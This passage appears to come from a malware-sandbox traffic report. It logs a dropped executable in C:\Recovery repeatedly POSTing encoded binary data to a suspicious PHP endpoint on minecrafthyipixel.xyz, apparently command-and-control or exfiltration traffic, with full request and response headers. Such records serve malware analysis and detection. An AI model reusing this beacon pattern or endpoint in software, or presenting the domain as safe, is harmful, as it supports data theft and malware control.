                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:58.174756050 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:58.174902916 CEST2512OUTData Raw: 57 5b 5e 5e 5c 40 51 5e 5c 5e 59 59 57 52 58 5f 54 57 5f 5f 54 5a 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^^\@Q^\^YYWRX_TW__TZS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'.)64Y'07%;.=#X&90R2.S 2&=8 ,<].5$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:58.448049068 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y5QscywSdPhoaoDuYJwVCLsZ0SoFyZuRBtMzQ15eXayNSgsnfjyHr3fbq8O73oqT8gaps1XN8oyKPtLIpHgY5FLPZqVkK5cfm3s17h5LXYGvvJ4f%2BBCAuMpcFgXqbojHHMGHzTg%2Frjo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3d44d701399-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:58.448141098 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    131192.168.2.449883104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:58.675501108 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:58.780447006 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:58.780755997 CEST2512OUTData Raw: 57 5b 5b 5c 59 44 51 5d 5c 5e 59 59 57 52 58 5a 54 50 5f 5f 54 5c 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[\YDQ]\^YYWRXZTP__T\S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2=!((Y'043;*;7&<S%. 2&Q>;[7<$\.%$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:59.039083004 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orK6%2ByT%2BUD3BL8tcz2WJfJsaPYvwgNTbRxuexYh%2FMLd3sMuqLrcqTiumMo58SwxTyOvEh6LxkKJuuyilmFPukaqgDL6r45ERuRd0ttsXx42VJxTcYTTMD652g7D2vj4EDDKhujuaIwc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3d80d5d6741-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:59.039145947 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    132192.168.2.449884104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:59.269053936 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:59.374207020 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:59.374496937 CEST2512OUTData Raw: 52 5a 5b 5f 59 42 51 58 5c 5e 59 59 57 52 58 52 54 50 5f 5d 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[_YBQX\^YYWRXRTP_]T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%> (#' 'P>^(29(%+.R#1*;/[4Z3:$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:59.648622990 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:59 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIQuTKjQU6oJAttduLdYbfVN%2BCzJAYRqDJ%2FTSxZinDRtrqElocEdCQfpZASRZLPmmZtHnxH7ckYXUc5kqTJ4ETqKk1Ls2Wipy6gBzQCpeD%2FoXC8Ii3b3QhSbaDFkdvlowzwxwbn%2BM8E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3dbc8ab1d70-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:59.648686886 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    133192.168.2.449885104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:59.873846054 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:59.978487968 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:59.978645086 CEST2512OUTData Raw: 52 5d 5e 5b 59 4b 51 5f 5c 5e 59 59 57 51 58 5c 54 5b 5f 57 54 59 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^[YKQ_\^YYWQX\T[_WTYSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z1=15(73#7\'+-=(]2)8U%("Q#"++4? [.%$[. X =
                                                                                                                                    Apr 19, 2024 13:44:00.324489117 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2BCwEyZnonOv7ADPpxG3yP3sGoOLJLXaZ%2BXLZs0OjcMRuSH0rqh5T7%2FPgW25dt805nV9XTilUITnH1lizN4f1vQtcU9NeC%2BYijpAum2YJ2m2CrjqByZCIgHWtYBAGLTD5i%2BuwiyBBVs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3df89d007ba-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:00.324687958 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    134192.168.2.449886104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:00.546367884 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2500
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:00.650974035 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:00.651326895 CEST2500OUTData Raw: 57 5b 5b 5c 59 42 54 5f 5c 5e 59 59 57 57 58 5b 54 5b 5f 5d 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[\YBT_\^YYWWX[T[_]T_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z%!+([3(';!>2 S%!7T"U), <\.5$[. X
                                                                                                                                    Apr 19, 2024 13:44:01.054461956 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1%2FeBSKZApXC5mWhhVLkjB2YSxDZ2WpPPysCa5xmBcDvGOl%2F1vNQ9BuGmvw5Vs5umrhDFGOFIUFwjJ3yNBogF8P2fpSsF2yAyQjrHJR6sIkCcTikxiqMTNI4Za3sVMcHcvRg5toTnS4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3e3cc155083-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:01.054526091 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    135192.168.2.449888104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:01.289743900 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:01.394599915 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:01.394872904 CEST2512OUTData Raw: 57 58 5e 5d 5c 44 54 5f 5c 5e 59 59 57 53 58 5d 54 50 5f 59 54 55 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^]\DT_\^YYWSX]TP_YTUSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^'.="+?0?]$)>(')28)7)>+'Z7^-%$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:01.656838894 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4vThcjH8mnW2fDtdIkKybE0I7vukCsIz%2FlZaJodWyJpVZHtLYyLdHhYokeneaGHE9mcRp6%2B%2FdfRpUTmHzSreUAp0UokFIE%2BWjkKvMYAxvbkTbAO7C5Ug9Jyb66BH55T4Y%2FlEbyfJZA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3e86e65b0e5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:01.656903028 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    136192.168.2.449889104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:01.888573885 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:01.993664980 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:01.993902922 CEST2512OUTData Raw: 57 5d 5b 58 59 4a 51 5f 5c 5e 59 59 57 5f 58 5c 54 51 5f 59 54 54 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W][XYJQ_\^YYW_X\TQ_YTTSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1&"( 30?^%+5*+4%*<$8>W!!1*^"<;9$[. X
                                                                                                                                    Apr 19, 2024 13:44:02.251390934 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:02 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oA4hHG7tY1hCTIavb3dpzd2ZFjlac9PUVBJx6vUwJsK5UnnoLMpSi%2FaS%2BRgnIeIRGEvcUEJNOmZu5WFjnnNi3bdr3qo8PGzTBa3b%2FHUoZ63%2BjqiefZ8SWpRClQ9oTRcUYS0tvrXjXvw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3ec2f40ade4-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:02.251449108 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    137192.168.2.449890104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:02.489798069 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:02.594557047 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:02.594822884 CEST2512OUTData Raw: 57 59 5e 58 59 43 51 59 5c 5e 59 59 57 5e 58 59 54 54 5f 56 54 54 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^XYCQY\^YYW^XYTT_VTTSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\%=2V!'$ 0+"=^#&3$+= W)8'^ Z?:$[. X
                                                                                                                                    Apr 19, 2024 13:44:02.860089064 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:02 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgfSQd432M6OAC4I6qbRtJiBCQaOQt9iCg3qQjFJXjVY6iVH9dA5a6uXie95P26VINmAx3HHsf4OVrE2BMkkC97MCsY6Ye%2BcVLBkiViCnMAWL%2B5zS1KUmrW1lfBQc3Z%2F2CTs%2FTuHxmc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3efecb044cf-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:02.860196114 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    138192.168.2.449891104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:03.093296051 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:03.197830915 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:03.197990894 CEST2512OUTData Raw: 57 54 5e 5f 59 4b 51 5a 5c 5e 59 59 57 5f 58 59 54 54 5f 5e 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^_YKQZ\^YYW_XYTT_^T\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2."]''3_';%?8#_&902.#"*]?]#.5$[. X
                                                                                                                                    Apr 19, 2024 13:44:03.460937977 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:03 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2gNUuGQ1BoebQdj8rCr7VarOZLorAmYdxFjK53t1m4jU2Uu3jExfMe%2FeENIj2nMjbw6N%2BDQUZRrUanPgvfmZ%2F5kbRTbDm4T5Zr8vVqztiTztIuTxRNAqXxRhr4GgHB6LLxDAUyW5%2FpY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3f3aa5ab0dc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:03.461000919 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    139192.168.2.449892104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:03.687530041 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:03.793061972 CEST25INHTTP/1.1 100 Continue
